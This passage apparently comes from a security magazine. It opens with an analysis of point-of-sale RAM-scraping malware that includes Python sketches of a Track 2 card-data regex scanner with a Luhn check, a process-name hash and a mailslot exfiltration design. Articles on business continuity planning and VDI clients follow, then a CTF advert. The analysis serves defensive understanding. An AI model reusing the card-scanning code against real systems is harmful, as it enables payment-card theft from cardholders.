The 2nd thread is responsible for inter-process communication. It creates a mailslot, which the threads use for communication. The malware creates a mailslot named \\.\mailslot\95d292040d8c4e31ac54a93ace198142 and listens on it for data collected by the 3rd thread. Once data is received, it is sent to the C&C in the same way as the machine information. Like the 1st thread, this thread loops, waiting for incoming messages.
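The producer/consumer design between the 2nd and 3rd threads can be mimicked in a few lines, with a Python Queue standing in for the Windows mailslot (a deliberate simplification; the real sample uses the CreateMailslot API, and the data and thread names here are fake):

```python
import queue
import threading

mailslot = queue.Queue()   # stands in for \\.\mailslot\95d2...
exfiltrated = []           # stands in for data POSTed to the C&C

def scraper_thread():
    # 3rd thread: "finds" card data and drops it into the mailslot.
    mailslot.put("4111111111111111=2512...")  # fake track data

def ipc_thread(n_messages):
    # 2nd thread: reads the mailslot and forwards the data to the C&C.
    for _ in range(n_messages):
        exfiltrated.append(mailslot.get())  # blocks until data arrives

t_ipc = threading.Thread(target=ipc_thread, args=(1,))
t_scraper = threading.Thread(target=scraper_thread)
t_ipc.start(); t_scraper.start()
t_scraper.join(); t_ipc.join()
print(exfiltrated)  # ['4111111111111111=2512...']
```

Decoupling scraping from exfiltration this way is why the malware keeps beaconing even when no card data has been found yet: the IPC thread simply blocks on the mailslot.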
The 3rd thread is the one responsible for scraping memory, searching for credit and debit card information, and sending it to the 2nd thread via the mailslot. The thread starts by reading system information to enumerate all processes running on the system, and then excludes system processes.
The scanning threads read the contents of each segment and search them for signatures of credit or debit card information. The signature is Track 1 and Track 2 data, the standard formats for credit and debit cards.
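The Track 2 signature search can be sketched as a regular-expression scan over a memory buffer. The regex and the Luhn pre-filter below are illustrative choices of ours, not the sample's actual matching code:

```python
import re

# Illustrative Track 2 signature: PAN (13-19 digits), '=' separator,
# expiry (YYMM) and further discretionary data. Not taken from the sample.
TRACK2 = re.compile(rb"(\d{13,19})=(\d{4})\d{3,}")

def luhn_ok(pan: bytes) -> bool:
    # Luhn checksum weeds out random digit runs that are not card numbers.
    digits = [int(c) for c in pan.decode()][::-1]
    total = sum(d if i % 2 == 0 else (d * 2 - 9 if d * 2 > 9 else d * 2)
                for i, d in enumerate(digits))
    return total % 10 == 0

def scan(buf: bytes):
    return [m.group(1) for m in TRACK2.finditer(buf) if luhn_ok(m.group(1))]

ram = b"noise...4111111111111111=2512101000000000?...noise"
print(scan(ram))  # [b'4111111111111111']
```

This is essentially what every RAM scraper does: read a process's committed, writable pages and grep them for track-shaped byte runs.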
For the non-system processes, the malware filters out well-known processes such as iexplore, firefox, etc. using a custom hash calculation. This is pseudo code for the hash calculator:

x = 0
for each character i in process_name:
    i = lowercase(i)
    x = x + i
    i = i * 128
    x = x xor i

The final value of x is the calculated hash. For the remaining processes, the thread opens them one by one, checks that each is not its own process, then retrieves information about the process's memory segments and searches for segments with state MEM_COMMIT and protection PAGE_READWRITE.
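The pseudo code transcribes directly into Python. This is our reading of it (the authoritative version is the routine in the unpacked sample, so treat this as a sketch):

```python
# Direct transcription of the pseudo code above: for each lowercased
# character, add its value to the running hash, then XOR the hash with
# the character value shifted left by 7 bits (i * 128).
def scraper_hash(process_name: str) -> int:
    x = 0
    for ch in process_name.lower():
        c = ord(ch)
        x = (x + c) ^ (c * 128)
    return x

# Case-insensitive by construction, as the lowercase step intends:
print(scraper_hash("IEXPLORE.EXE") == scraper_hash("iexplore.exe"))  # True
```

Hashing the process names instead of comparing strings is a common trick to keep the exclusion list out of the binary's visible strings, which also complicates static analysis.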
For every segment with these specifications, the contents are read and a new thread is created to work on them.
Reviews
A Guide to Business Continuity Planning
Khaled Alaa
Information Security Engineer at Raya Data Center
Purpose
Disasters can strike at any time. They range from large-scale natural catastrophes and acts of terror to technology-related accidents and environmental incidents. The causes of these hazards differ, whether human negligence, malevolence or natural disaster, but their likelihood (and seriousness) is no less real. The purpose of this document is to give an overview of what Business Continuity Planning is and to provide some guidance and resources for beginners.
General Information
This International Standard (ISO 22301) specifies requirements for setting up and managing an effective Business Continuity Management System (BCMS). A BCMS emphasizes the importance of:
• understanding the organization's needs and the necessity for establishing business continuity management policy and objectives,
• implementing and operating controls and measures for managing an organization's overall capability to manage disruptive incidents,
• monitoring and reviewing the performance and effectiveness of the BCMS, and
• continual improvement based on objective measurement.

Business continuity contributes to a more resilient society. Because of the wider community and the impact of the organization's environment on the organization, other organizations may also need to be involved in the recovery process.

The Plan-Do-Check-Act (PDCA) Model
A BCMS, like any other management system, has the following key components:
a. a policy;
b. people with defined responsibilities;
c. management processes relating to policy, planning, implementation and operation, performance assessment, management review, and improvement;
d. documentation providing auditable evidence; and
e. any business continuity management processes relevant to the organization.
Plan (Establish)
Establish business continuity policy, objectives, targets, controls, processes and procedures relevant to improving business continuity in order to deliver results that align with the organization’s overall policies and objectives.
Do (Implement and operate)
Implement and operate the business continuity policy, controls, processes and procedures.
Check (Monitor and review)
Monitor and review performance against business continuity policy and objectives, report the results to management for review, and determine and authorize actions for remediation and improvement.
Act (Maintain and improve)
Maintain and improve the BCMS by taking corrective action, based on the results of management review and reappraising the scope of the BCMS and business continuity policy and objectives.
What Is Business Continuity Planning?
Business Continuity refers to the activities required to keep your organization running during a period of displacement or interruption of normal operation, whereas Disaster Recovery is the process of rebuilding your operation or infrastructure after the disaster has passed. According to the Business Continuity Institute's Glossary:

"Business continuity plan is a collection of procedures and information which is developed, compiled and maintained in readiness for use in the event of an emergency or disaster."

When Do We Need a Business Continuity Plan?
We need a Business Continuity Plan whenever there is a disruption to the business, such as a disaster. The plan should cover the occurrence of the following events:
a) Equipment failure (such as a disk crash).
b) Disruption of power supply or telecommunications.
c) Application failure or corruption of a database.
d) Human error, sabotage or strike.
e) Malicious software (viruses, worms, Trojan horses).
f) Hacking or other Internet attacks.
g) Social unrest or terrorist attacks.
h) Fire.
i) Natural disasters (flood, earthquake, hurricanes).

Who Should Participate in Business Continuity Planning?
Normally a Business Continuity Coordinator or Disaster Recovery Coordinator is responsible for maintaining the Business Continuity Plan. However, his or her job is not to update the plan alone; it is to carry out periodic reviews by distributing the relevant parts of the plan to the owners of the documents and ensuring the documents are kept updated.

How ISO 22301 Helps

Business Continuity Issue: Business disruption, impacting delivery of products or services to customers.
How ISO helps:
• It needs you to consider interested parties affected by the BCMS and their requirements, and plan out how, when and with whom you will communicate.
• It makes sure that a BC strategy is developed that defines acceptable timescales for resumption of activities for both you and your suppliers.
• It enables you to understand the impact of risks facing your organization.
• It requires cross-organizational working.
• It needs you to test your plans and work jointly with partners and suppliers through exercising, making BC real, not just a paper-based exercise.
Benefits:
• Reduces the impact and frequency of business disruptions.
• Enhances your ability to respond when disruptions do occur.
• Gives you confidence in your responses and ensures appropriate and agile contingencies.
• Better stakeholder/interested-party relationships.

Business Continuity Issue: Reputation damage.
How ISO helps:
• It requires you to implement and maintain BC plans, helping you better manage disruptive incidents and continue activities.
• It calls for plans to be tested regularly to ensure they work, and gives you confidence that you can deliver on time as your customers and contracts dictate.
• It ensures you understand your role in your wider environment and supply chain.
Benefits:
• Protects and enhances your reputation and credibility.
• Improves your ability to win tenders.
• Increases business growth, attracting more investors.

Business Continuity Issue: Insufficient understanding of threats to BC.
How ISO helps:
• It requires you to evaluate the impact of a disruption based on your organization's ability to operate over time.
• It makes sure you mitigate business continuity risks based on the impact, not the cause, of incidents.
• It requires you to carry out regular risk assessments, including those affecting interested parties and the wider community.
• It makes you consider how each risk will be handled.
Benefits:
• Greater visibility of business risks, both externally and internally across the organization.
• Increases confidence in your recovery plans.
• Shows your clients and supply chain that you are committed to BC.
• Demonstrates a duty of care to staff, no matter what happens.
• Cost savings through mitigating the impact of disruptions.
• Improves risk identification and brings about a consistent approach across your organization.

Business Continuity Issue: Lack of management commitment.
How ISO helps:
• It requires top management involvement in the development and continual improvement of the BCMS.
• It makes sure top management provide the relevant resources to deliver the BCMS.
• It calls for top management to assign and communicate roles and responsibilities related to the BCMS.
• It requires top management's "active engagement" in exercising.
Benefits:
• Strengthens management commitment and ensures BCM is taken seriously.
• Increases employee engagement and understanding.
• Makes sure sufficient resources are available for BC testing and delivery.
• Gives visibility to employees, suppliers and customers of senior management's commitment to BCM.
How to Prepare a Business Continuity Plan

Business Continuity Planning Phases
1. Project Initiation
• Define the Business Continuity objective and scope of coverage.
• Establish a Business Continuity Steering Committee.
• Draw up Business Continuity policies.
2. Business Analysis
• Perform a Risk Analysis and Business Impact Analysis.
• Consider alternative Business Continuity strategies.
• Carry out a Cost-Benefit Analysis and select a strategy.
• Develop a Business Continuity budget.
3. Design and Development (Designing the Plan)
• Set up a Business Recovery Team and assign responsibility to its members.
• Identify the plan structure and major components.
• Develop backup and recovery strategies.
• Develop scenarios under which to execute the plan.
• Develop escalation, notification and plan activation criteria.
• Develop a general plan administration policy.
4. Implementation (Creating the Plan)
• Prepare emergency response procedures.
• Prepare command center activation procedures.
• Prepare detailed recovery procedures.
• Prepare vendor contracts and purchase recovery resources.
• Ensure everything necessary is in place.
• Ensure Recovery Team members know their duties and responsibilities.
5. Testing
• Exercise the plan based on the selected scenario.
• Produce a test report and evaluate the results.
• Provide training and awareness to all personnel.
6. Maintenance (Updating the Plan)
• Review the plan periodically.
• Update the plan with any changes or improvements.
• Distribute the plan to Recovery Team members.

Business Continuity Plan outline (simplified, based on the sample BCP provided by MIT):

PART I: INTRODUCTION
PART II: DESIGN OF THE PLAN
1. Overview
a. Purpose
b. Assumptions
c. Development
d. Maintenance
e. Testing
2. Organization of Disaster Response and Recovery
a. Steering Committee
b. Business Continuity Management Team
c. Organization Support Teams
d. Disaster Response
e. Disaster Detection and Determination
f. Disaster Notification
3. Initiation of the Business Continuity Plan
a. Activation of a Site
b. Dissemination of Public Information
c. Disaster Recovery Strategy
d. Emergency Phase
e. Backup Phase
f. Recovery Phase
4. Scope of the Business Continuity Plan
a. Category I - Critical Functions
b. Category II - Essential Functions
c. Category III - Necessary Functions
d. Category IV - Desirable Functions
PART III: TEAM DESCRIPTIONS
1. Business Continuity Management Team
2. Organization Support Teams
b- Damage Assessment/Salvage Team
c- Transportation Team
d- Physical Security Team
e- Public Information Team
f- Insurance Team
g- Telecommunication Team
PART IV: RECOVERY PROCEDURES
1. Notification List - contact information for all team members.
2. Action Procedures - list of actions to be carried out by each team.
References
http://www.thebci.org/index.php/resources/what-is-business-continuity
http://www.thebci.org/index.php/resources/knowledgebank/cat_view/1-business-continuity/8-bcm-lifecycle
https://www.sans.org/.../introduction-business-continuity
Best Practice How to secure your network by using Virtual Desktop Infrastructure
Internal threats are a main security challenge. Nowadays, using a private cloud with VDI (Virtual Desktop Infrastructure) in an enterprise solution can add valuable controls that mitigate some internal information security threats. In the 90's there was very little exchange of files between people; most data was exchanged on floppy disks, USB flash memory and CD-RWs, which remain an information security threat alongside the Internet. Securing a traditional PC is now more difficult because of the security challenges posed by Internet and internal network attacks; most incoming attacks exploit breaches of the operating system or of applications.
Waleed Hamouda
AIBK Bank IT Security & Research Consultant
The threat of viruses and Trojans is high. Securing traditional PCs on a network against viruses takes time because A/V signature updates must be distributed to each PC, and modern threats are more complex: Advanced Persistent Threats (APTs) are stealthy, continuous hacking processes that can spread across the network before the A/V detects them. VDI is more secure than traditional desktops. If you are able to centralize your data, there are several benefits in security and support:
1. Proactive response to security incidents. If you deploy VDI and all of your desktop operating systems run in a centralized data centre (or regional data centres throughout the world), then patching those Windows instances, distributing A/V signatures, updating HIPS agents, etc. can be accomplished more rapidly than if those assets were spread over WAN links or frequently disconnected from the network, as with laptops.
2. Collapse branch infrastructure. If you succeed in deploying VDI at large scale, you can probably collapse branch-office file/print servers, email servers and maybe even app servers.
3. Data sharing. If all of your data is in one location, it is much easier to share data among users without worrying about delays transmitting it over WAN connections or replicating it across multiple sites.
4. Data backup. If your data is located centrally, it is much easier to back it up and configure offsite backups. If your data were spread over 100 different sites, you would potentially need multiple backup systems and multiple DR strategies.
5. eDiscovery. If your organization requires eDiscovery for audit purposes, having the data in one place makes this slightly easier. You will of course still need to address eDiscovery on laptops, smartphones, tablets, etc., but it does make it a bit easier.
6. Protection against theft. There is no more need to worry about stolen secrets or missing laptops. A thin client or zero client offers no hard disk to steal, and the device itself is of little use to a thief because it will not work without the servers.
7. Reduced desktop support and management costs, and lower power consumption.
VDI does that; traditional desktops cannot.

When should you use Virtual Desktop Infrastructure (VDI), and what is the difference between zero-client and thin-client endpoints? Once an enterprise reaches the decision to create a VDI, the question becomes: thin clients or zero clients? Thin clients and zero clients are both small-form-factor, solid-state computing terminal devices designed specifically for VDI, but they have many different characteristics. When choosing between them, you need to understand the benefits and challenges of each VDI option, the environment being deployed and the users' desktop needs. Virtual desktops are hosted in the data centre, and the thin or zero client simply serves as a terminal to the back-end server, much like the mainframe-and-terminal concept of the 1970s and 1980s. By using zero or thin clients you avoid the three-year refresh cycle on PCs, either by repurposing existing PCs as terminals or by replacing them with cheaper terminals, rather than buying PCs with more disk, RAM or CPU than users need. VDI lets you push out compute resources from a server rather than installing those resources directly onto the end user's device: because VDI depends on servers behind the scenes to handle the compute, you are less likely to need to update or refresh the endpoint devices. In many ways thin clients and zero clients are similar, but what are the differences between the two? More importantly, which type would be best for your IT environment?

The Similarities Between Thin and Zero VDI Clients
When you virtualize the infrastructure to support VDI on back-end servers in the data centre, zero and thin clients share the same benefits:
• Simple to install and replace.
• Require less maintenance.
• Improve security.
• Reduce hardware needs compared with PCs.
• Rely on a network connection to a central server for full computing and do little processing on the hardware itself.
• Require a centralized management system.
The Differences Between Thin and Zero VDI Clients

Operating system:
• Thin: runs its own native operating system, usually a version of Windows Embedded Standard (WES) or a Linux-based operating system such as DeTOS.
• Zero: has a highly tuned onboard processor designed for one of possibly three VDI protocols (PCoIP, HDX, or RemoteFX); most of the decoding and display processing takes place in dedicated hardware.

Connection protocols:
• Thin: uses connection protocols such as Citrix ICA or Microsoft RDP to remotely access a desktop hosted on a virtual machine on a server.
• Zero: likewise accesses a desktop hosted on a virtual machine on a server, through its dedicated protocol.

Multimedia:
• Thin: consider one if you need capabilities such as 3-D, video conferencing and multi-monitor support.
• Zero: slower with heavy 3-D; does not support high-end video or multi-monitor setups.

Boot:
• Thin: boots its embedded operating system and then connects to the server.
• Zero: boots in just a few seconds and is immune to viruses.

Maintenance:
• Thin: needs maintenance of the embedded operating system.
• Zero: requires very little maintenance; only needs a BIOS update on a significant change or enhancement.

Setup:
• Thin: requires more setup.
• Zero: requires less setup.

User options:
• Thin: what users can do is not limited.
• Zero: what users can do is more limited.
Which of the two types would be best for your IT environment? Thin clients offer a better video experience; if your user environment needs applications with heavy video, you should also take into account your remote display protocol and how much display processing your back end can supply. If your users run standard applications and you want to enforce security and easy management, you can go with zero clients. Both zero and thin client devices rely on a network connection to a central server for full computing and do little processing on the hardware itself. If you go with thin clients, your thin client management software should be a powerful product that combines thin client management capabilities with connection management features. The first step in deciding between thin and zero clients really rests on the requirements of your network and the connection you prefer for your end users.
Capture the Flag competition at GISEC 2016 29th - 31st March Dubai World Trade Centre
CyberTalents.com in collaboration with DWTC, will be organizing the first Capture the Flag competition at GISEC 2016. www.cybertalents.com